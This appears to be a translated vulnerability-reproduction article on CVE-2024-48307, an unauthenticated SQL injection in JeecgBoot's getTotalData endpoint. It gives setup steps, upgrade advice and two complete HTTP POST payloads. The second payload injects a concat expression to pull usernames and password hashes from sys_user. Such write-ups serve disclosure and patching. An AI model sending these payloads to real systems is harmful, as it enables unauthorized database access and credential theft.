Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: hexixi@Timeline Sec Количество слов в этой статье: 2248. Время чтения: 2~4 минуты Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.
JeecgBoot — это платформа с низким кодированием, основанная на BPM! Архитектура разделения фронтенда и бэкенда SpringBoot 2.x/3.x,SpringCloud,Ant Design&Vue3,Mybatis-plus,Shiro,JWT,Поддержка микросервисов. Он имеет такие функции, как генератор кода, управление разрешениями, механизм рабочего процесса, сигнализация мониторинга, большой экран данных и т. д.,Это может помочь разработчикам быстро создавать системы приложений корпоративного уровня.
Номер уязвимости: CVE-2024-48307.
Уязвимость внедрения SQL была обнаружена в компоненте /onlDragDatasetHead/getTotalData в JeecgBoot v3.7.1. Злоумышленник может использовать jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar без разрешения на запрос базы данных, что приведет к утечке информации о базе данных.
jimureport-spring-boot-starter.version<=1.8.1
https://github.com/jeecgboot/JeecgBoot/releases
серверная часть развертывания идеи
Войдите в каталог jeecgboot-vue3 и выполните команду pnpm dev, чтобы открыть интерфейс.
Посетите http://IP:8080/jeecg-boot/drag/onlDragDatasetHead/getTotalData и обнаружите, что служба доступна, но к ней нельзя получить доступ в режиме получения.
Создайте данные json на основе исходного кода и попытайтесь получить доступ к идентификатору таблицы sys_user.
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 296
Content-Type: application/json
{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(id)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "string"}], "type": []}}
Запросить имя пользователя и пароль
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 311
{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(username,0x3a,password)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "1"}], "type": []}}
Обновите плагин Jimureport до последней версии.
https://help.jeecg.com/setup/startup.html
CNVD-2023-69437 CVE-2023-6307 CVE-2023-4450 CVE-2023-42268 CVE-2023-41578 CVE-2023-41544 CVE-2023-41543 CVE-2023-41542 CVE-2023-40989 CVE-2023-38992 CVE-2023-34659 CVE-2023-34603 CVE-2023-34602 CVE-2023-24789 CVE-2023-1784 CVE-2023-1741 CVE-2023-1454